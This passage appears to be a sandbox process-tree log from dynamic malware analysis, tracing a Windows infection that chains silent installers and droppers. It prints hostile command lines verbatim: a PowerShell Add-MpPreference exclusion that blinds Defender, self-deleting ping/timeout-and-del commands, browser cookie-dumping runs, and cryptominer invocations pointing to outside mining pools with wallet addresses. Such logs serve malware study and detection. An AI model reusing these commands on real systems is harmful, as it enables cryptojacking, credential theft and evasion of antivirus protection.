C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-RFVUA.tmp\{app}\chrome_proxy.exe"3⤵PID:1808
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 44⤵
- Runs ping.exe
PID:9636
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-U8SRT.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-U8SRT.tmp\Setup3310.tmp" /SL5="$801EA,138429,56832,C:\Users\Admin\AppData\Local\Temp\rfln1k1pfm1\Setup3310.exe" /Verysilent /subid=5771⤵PID:5520
-
C:\Users\Admin\AppData\Local\Temp\is-F4T8I.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-F4T8I.tmp\Setup.exe" /Verysilent2⤵PID:6044
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"3⤵PID:5700
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5912
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4760
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"3⤵PID:5596
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 9484⤵
- Program crash
PID:7528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 9564⤵
- Program crash
PID:6184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 10804⤵
- Program crash
PID:4976
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 11684⤵
- Program crash
PID:6516
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 11804⤵
- Program crash
PID:8276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 12444⤵
- Program crash
PID:6520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 15044⤵
- Program crash
PID:8324
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 15724⤵
- Program crash
PID:7208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 15404⤵
- Program crash
PID:7148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 15844⤵
- Program crash
PID:8680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 15524⤵
- Program crash
PID:4628
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 16164⤵
- Program crash
PID:7308
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5596 -s 1244⤵
- Program crash
PID:8440
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"3⤵PID:5512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5512 -s 28604⤵
- Program crash
PID:7508
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"3⤵PID:5236
-
C:\Users\Admin\AppData\Local\Temp\is-MUJTG.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-MUJTG.tmp\LabPicV3.tmp" /SL5="$203BE,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"4⤵PID:5708
-
C:\Users\Admin\AppData\Local\Temp\is-EBLC1.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-EBLC1.tmp\ppppppfy.exe" /S /UID=lab2145⤵PID:5548
-
C:\Program Files\Uninstall Information\OBJVKSZTZQ\prolab.exe"C:\Program Files\Uninstall Information\OBJVKSZTZQ\prolab.exe" /VERYSILENT6⤵PID:4312
-
C:\Users\Admin\AppData\Local\Temp\is-GFT1N.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-GFT1N.tmp\prolab.tmp" /SL5="$703AE,575243,216576,C:\Program Files\Uninstall Information\OBJVKSZTZQ\prolab.exe" /VERYSILENT7⤵PID:5368
-
-
-
C:\Users\Admin\AppData\Local\Temp\c7-6f3f0-468-a06b4-9fb3975d0f8de\Fishyhahofi.exe"C:\Users\Admin\AppData\Local\Temp\c7-6f3f0-468-a06b4-9fb3975d0f8de\Fishyhahofi.exe"6⤵PID:4704
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ewnxiuld.qgw\md6_6ydj.exe & exit7⤵PID:5312
-
C:\Users\Admin\AppData\Local\Temp\ewnxiuld.qgw\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\ewnxiuld.qgw\md6_6ydj.exe8⤵PID:8008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ibwub3mr.ucx\askinstall31.exe & exit7⤵PID:7416
-
C:\Users\Admin\AppData\Local\Temp\ibwub3mr.ucx\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\ibwub3mr.ucx\askinstall31.exe8⤵PID:7996
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:8400
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:9036
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fega0ew3.ttl\toolspab1.exe & exit7⤵PID:7568
-
C:\Users\Admin\AppData\Local\Temp\fega0ew3.ttl\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\fega0ew3.ttl\toolspab1.exe8⤵PID:7280
-
C:\Users\Admin\AppData\Local\Temp\fega0ew3.ttl\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\fega0ew3.ttl\toolspab1.exe9⤵PID:7864
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a55nftoz.gvb\GcleanerWW.exe /mixone & exit7⤵PID:7720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hyyb3yoh.era\setup_10.2_mix.exe & exit7⤵PID:4600
-
C:\Users\Admin\AppData\Local\Temp\hyyb3yoh.era\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\hyyb3yoh.era\setup_10.2_mix.exe8⤵PID:6856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4urs1zhe.wxr\file.exe & exit7⤵PID:7800
-
C:\Users\Admin\AppData\Local\Temp\4urs1zhe.wxr\file.exeC:\Users\Admin\AppData\Local\Temp\4urs1zhe.wxr\file.exe8⤵PID:4740
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"9⤵PID:8468
-
C:\Users\Admin\AppData\Local\Temp\K9SFLFBXAE\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\K9SFLFBXAE\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵PID:7888
-
C:\Users\Admin\AppData\Local\Temp\K9SFLFBXAE\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\K9SFLFBXAE\multitimer.exe" 1 3.1617537577.6069aa2920fa5 10111⤵PID:8816
-
C:\Users\Admin\AppData\Local\Temp\K9SFLFBXAE\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\K9SFLFBXAE\multitimer.exe" 2 3.1617537577.6069aa2920fa512⤵PID:8832
-
C:\Users\Admin\AppData\Local\Temp\fh4ewfrvqlr\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\fh4ewfrvqlr\Setup3310.exe" /Verysilent /subid=57713⤵PID:9156
-
C:\Users\Admin\AppData\Local\Temp\is-1LGKU.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-1LGKU.tmp\Setup3310.tmp" /SL5="$505B8,138429,56832,C:\Users\Admin\AppData\Local\Temp\fh4ewfrvqlr\Setup3310.exe" /Verysilent /subid=57714⤵PID:8364
-
C:\Users\Admin\AppData\Local\Temp\is-NMEIT.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-NMEIT.tmp\Setup.exe" /Verysilent15⤵PID:9888
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\p1h55sggo5d\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\p1h55sggo5d\cpyrix.exe" /VERYSILENT13⤵PID:7476
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe14⤵PID:5936
-
C:\Users\Admin\AppData\Local\Temp\20cf9de0-af68-401e-9e27-bb1ac9dd6d61\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\20cf9de0-af68-401e-9e27-bb1ac9dd6d61\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\20cf9de0-af68-401e-9e27-bb1ac9dd6d61\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run15⤵PID:9328
-
C:\Users\Admin\AppData\Local\Temp\20cf9de0-af68-401e-9e27-bb1ac9dd6d61\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\20cf9de0-af68-401e-9e27-bb1ac9dd6d61\AdvancedRun.exe" /SpecialRun 4101d8 932816⤵PID:10040
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force15⤵PID:912
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 115⤵PID:9268
-
C:\Windows\SysWOW64\timeout.exetimeout 116⤵
- Delays execution with timeout.exe
PID:8684
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"15⤵PID:5344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 104015⤵
- Program crash
PID:5592
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe14⤵PID:8292
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"15⤵PID:7860
-
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"15⤵PID:9688
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\rjv2coao2ij\qd1ch2gfnk2.exe"C:\Users\Admin\AppData\Local\Temp\rjv2coao2ij\qd1ch2gfnk2.exe" /ustwo INSTALL13⤵PID:4736
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "qd1ch2gfnk2.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\rjv2coao2ij\qd1ch2gfnk2.exe" & exit14⤵PID:9772
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "qd1ch2gfnk2.exe" /f15⤵
- Kills process with taskkill
PID:10016
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0i52xze2ue0\app.exe"C:\Users\Admin\AppData\Local\Temp\0i52xze2ue0\app.exe" /8-2313⤵PID:4604
-
-
C:\Users\Admin\AppData\Local\Temp\y5334yxqdub\vict.exe"C:\Users\Admin\AppData\Local\Temp\y5334yxqdub\vict.exe" /VERYSILENT /id=53513⤵PID:6536
-
C:\Users\Admin\AppData\Local\Temp\is-56B92.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-56B92.tmp\vict.tmp" /SL5="$10686,870426,780800,C:\Users\Admin\AppData\Local\Temp\y5334yxqdub\vict.exe" /VERYSILENT /id=53514⤵PID:8760
-
C:\Users\Admin\AppData\Local\Temp\is-2C8PJ.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-2C8PJ.tmp\win1host.exe" 53515⤵PID:5448
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\07002OJVY8\setups.exe"C:\Users\Admin\AppData\Local\Temp\07002OJVY8\setups.exe" ll10⤵PID:6892
-
C:\Users\Admin\AppData\Local\Temp\is-4MKD5.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-4MKD5.tmp\setups.tmp" /SL5="$90298,454998,229376,C:\Users\Admin\AppData\Local\Temp\07002OJVY8\setups.exe" ll11⤵PID:9168
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"9⤵PID:7556
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵PID:5788
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
PID:7772
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"9⤵PID:8112
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"10⤵PID:8616
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install11⤵PID:8784
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"9⤵PID:4416
-
C:\Users\Admin\AppData\Roaming\DFE8.tmp.exe"C:\Users\Admin\AppData\Roaming\DFE8.tmp.exe"10⤵PID:4224
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\DFE8.tmp.exe11⤵PID:5840
-
C:\Windows\SysWOW64\timeout.exetimeout /t 312⤵
- Delays execution with timeout.exe
PID:8052
-
-
-
-
C:\Users\Admin\AppData\Roaming\DA2B.tmp.exe"C:\Users\Admin\AppData\Roaming\DA2B.tmp.exe"10⤵PID:8148
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999911⤵PID:7064
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999911⤵PID:7372
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"10⤵PID:8248
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.111⤵
- Runs ping.exe
PID:4320
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"9⤵PID:8620
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qf2ovg4u.mgx\app.exe /8-2222 & exit7⤵PID:7256
-
C:\Users\Admin\AppData\Local\Temp\qf2ovg4u.mgx\app.exeC:\Users\Admin\AppData\Local\Temp\qf2ovg4u.mgx\app.exe /8-22228⤵PID:8096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jstylwxb.l2y\Four.exe & exit7⤵PID:7136
-
C:\Users\Admin\AppData\Local\Temp\jstylwxb.l2y\Four.exeC:\Users\Admin\AppData\Local\Temp\jstylwxb.l2y\Four.exe8⤵PID:8460
-
C:\Users\Admin\AppData\Local\Temp\N2B26USJ0Y\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\N2B26USJ0Y\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 1049⤵PID:8660
-
C:\Users\Admin\AppData\Local\Temp\N2B26USJ0Y\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\N2B26USJ0Y\multitimer.exe" 1 3.1617537668.6069aa84dfa74 10410⤵PID:5492
-
C:\Users\Admin\AppData\Local\Temp\N2B26USJ0Y\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\N2B26USJ0Y\multitimer.exe" 2 3.1617537668.6069aa84dfa7411⤵PID:10044
-
C:\Users\Admin\AppData\Local\Temp\c0o54n3h5bs\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\c0o54n3h5bs\Setup3310.exe" /Verysilent /subid=57712⤵PID:9880
-
C:\Users\Admin\AppData\Local\Temp\is-I3SN3.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-I3SN3.tmp\Setup3310.tmp" /SL5="$60786,138429,56832,C:\Users\Admin\AppData\Local\Temp\c0o54n3h5bs\Setup3310.exe" /Verysilent /subid=57713⤵PID:8204
-
C:\Users\Admin\AppData\Local\Temp\is-T7UQN.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-T7UQN.tmp\Setup.exe" /Verysilent14⤵PID:9072
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cztn3myokro\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\cztn3myokro\cpyrix.exe" /VERYSILENT12⤵PID:9468
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe13⤵PID:7640
-
C:\Users\Admin\AppData\Local\Temp\96bc0b2f-b905-4119-8aab-272f5338f30e\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\96bc0b2f-b905-4119-8aab-272f5338f30e\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\96bc0b2f-b905-4119-8aab-272f5338f30e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run14⤵PID:9964
-
C:\Users\Admin\AppData\Local\Temp\96bc0b2f-b905-4119-8aab-272f5338f30e\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\96bc0b2f-b905-4119-8aab-272f5338f30e\AdvancedRun.exe" /SpecialRun 4101d8 996415⤵PID:5828
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force14⤵PID:8056
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 114⤵PID:4660
-
C:\Windows\SysWOW64\timeout.exetimeout 115⤵
- Delays execution with timeout.exe
PID:10200
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"14⤵PID:1764
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"14⤵PID:9916
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe13⤵PID:8380
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"14⤵PID:9188
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\slajuayewcr\vict.exe"C:\Users\Admin\AppData\Local\Temp\slajuayewcr\vict.exe" /VERYSILENT /id=53512⤵PID:10196
-
C:\Users\Admin\AppData\Local\Temp\is-T5M9J.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-T5M9J.tmp\vict.tmp" /SL5="$60732,870426,780800,C:\Users\Admin\AppData\Local\Temp\slajuayewcr\vict.exe" /VERYSILENT /id=53513⤵PID:7784
-
C:\Users\Admin\AppData\Local\Temp\is-SIM6I.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-SIM6I.tmp\win1host.exe" 53514⤵PID:7356
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gl04321j4iu\iox55e0zz1s.exe"C:\Users\Admin\AppData\Local\Temp\gl04321j4iu\iox55e0zz1s.exe" /ustwo INSTALL12⤵PID:1196
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "iox55e0zz1s.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\gl04321j4iu\iox55e0zz1s.exe" & exit13⤵PID:8392
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "iox55e0zz1s.exe" /f14⤵
- Kills process with taskkill
PID:1236
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wqzquhyfols\app.exe"C:\Users\Admin\AppData\Local\Temp\wqzquhyfols\app.exe" /8-2312⤵PID:5108
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\YMCO7ER51C\setups.exe"C:\Users\Admin\AppData\Local\Temp\YMCO7ER51C\setups.exe" ll9⤵PID:8624
-
C:\Users\Admin\AppData\Local\Temp\is-DKG55.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-DKG55.tmp\setups.tmp" /SL5="$40676,454998,229376,C:\Users\Admin\AppData\Local\Temp\YMCO7ER51C\setups.exe" ll10⤵PID:7600
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\30-0e3d0-259-433ad-03cae3391a256\Caebaezhydinu.exe"C:\Users\Admin\AppData\Local\Temp\30-0e3d0-259-433ad-03cae3391a256\Caebaezhydinu.exe"6⤵PID:4436
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"3⤵PID:4828
-
C:\Users\Admin\AppData\Local\Temp\is-3U0OP.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-3U0OP.tmp\lylal220.tmp" /SL5="$203C2,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"4⤵PID:5748
-
C:\Users\Admin\AppData\Local\Temp\is-EBLC0.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-EBLC0.tmp\Microsoft.exe" /S /UID=lylal2205⤵PID:7064
-
C:\Program Files\Microsoft Office\SLXDIJZUSH\irecord.exe"C:\Program Files\Microsoft Office\SLXDIJZUSH\irecord.exe" /VERYSILENT6⤵PID:4808
-
C:\Users\Admin\AppData\Local\Temp\is-NBAC5.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-NBAC5.tmp\irecord.tmp" /SL5="$20372,6265333,408064,C:\Program Files\Microsoft Office\SLXDIJZUSH\irecord.exe" /VERYSILENT7⤵PID:5556
-
-
-
C:\Users\Admin\AppData\Local\Temp\71-5ce35-f7b-440af-e7f73ee57e46f\Sotewosagy.exe"C:\Users\Admin\AppData\Local\Temp\71-5ce35-f7b-440af-e7f73ee57e46f\Sotewosagy.exe"6⤵PID:4552
-
-
C:\Users\Admin\AppData\Local\Temp\c3-8c29e-3bb-852bc-58ad34c8b5275\Gaexaholaedo.exe"C:\Users\Admin\AppData\Local\Temp\c3-8c29e-3bb-852bc-58ad34c8b5275\Gaexaholaedo.exe"6⤵PID:6232
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v0jdpeip.5kh\md6_6ydj.exe & exit7⤵PID:8176
-
C:\Users\Admin\AppData\Local\Temp\v0jdpeip.5kh\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\v0jdpeip.5kh\md6_6ydj.exe8⤵PID:8016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m32edapm.tmu\toolspab1.exe & exit7⤵PID:7764
-
C:\Users\Admin\AppData\Local\Temp\m32edapm.tmu\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\m32edapm.tmu\toolspab1.exe8⤵PID:8448
-
C:\Users\Admin\AppData\Local\Temp\m32edapm.tmu\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\m32edapm.tmu\toolspab1.exe9⤵PID:8864
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ldrn3u2a.q1z\askinstall31.exe & exit7⤵PID:6400
-
C:\Users\Admin\AppData\Local\Temp\ldrn3u2a.q1z\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\ldrn3u2a.q1z\askinstall31.exe8⤵PID:8332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gzbj05yi.25i\GcleanerWW.exe /mixone & exit7⤵PID:7432
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yrfnlsg1.vb1\setup_10.2_mix.exe & exit7⤵PID:7564
-
C:\Users\Admin\AppData\Local\Temp\yrfnlsg1.vb1\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\yrfnlsg1.vb1\setup_10.2_mix.exe8⤵PID:4272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3avrc5nf.b5h\file.exe & exit7⤵PID:4408
-
C:\Users\Admin\AppData\Local\Temp\3avrc5nf.b5h\file.exeC:\Users\Admin\AppData\Local\Temp\3avrc5nf.b5h\file.exe8⤵PID:8172
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"9⤵PID:9028
-
C:\Users\Admin\AppData\Local\Temp\M3HK2A3DXM\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\M3HK2A3DXM\multitimer.exe" 0 3060197d33d91c80.94013368 0 10110⤵PID:6816
-
C:\Users\Admin\AppData\Local\Temp\M3HK2A3DXM\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\M3HK2A3DXM\multitimer.exe" 1 3.1617537596.6069aa3c3b626 10111⤵PID:7748
-
C:\Users\Admin\AppData\Local\Temp\M3HK2A3DXM\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\M3HK2A3DXM\multitimer.exe" 2 3.1617537596.6069aa3c3b62612⤵PID:8060
-
C:\Users\Admin\AppData\Local\Temp\apxv5pe4eoo\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\apxv5pe4eoo\Setup3310.exe" /Verysilent /subid=57713⤵PID:7496
-
C:\Users\Admin\AppData\Local\Temp\is-PTDGG.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-PTDGG.tmp\Setup3310.tmp" /SL5="$30728,138429,56832,C:\Users\Admin\AppData\Local\Temp\apxv5pe4eoo\Setup3310.exe" /Verysilent /subid=57714⤵PID:1296
-
C:\Users\Admin\AppData\Local\Temp\is-K50G1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-K50G1.tmp\Setup.exe" /Verysilent15⤵PID:7412
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\12b4nb5lufj\app.exe"C:\Users\Admin\AppData\Local\Temp\12b4nb5lufj\app.exe" /8-2313⤵PID:1368
-
-
C:\Users\Admin\AppData\Local\Temp\dwv1xt0etc4\xrokwo3abf0.exe"C:\Users\Admin\AppData\Local\Temp\dwv1xt0etc4\xrokwo3abf0.exe" /ustwo INSTALL13⤵PID:8772
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "xrokwo3abf0.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\dwv1xt0etc4\xrokwo3abf0.exe" & exit14⤵PID:9404
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "xrokwo3abf0.exe" /f15⤵
- Kills process with taskkill
PID:3096
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\x0mernrdufh\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\x0mernrdufh\cpyrix.exe" /VERYSILENT13⤵PID:8924
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe14⤵PID:10192
-
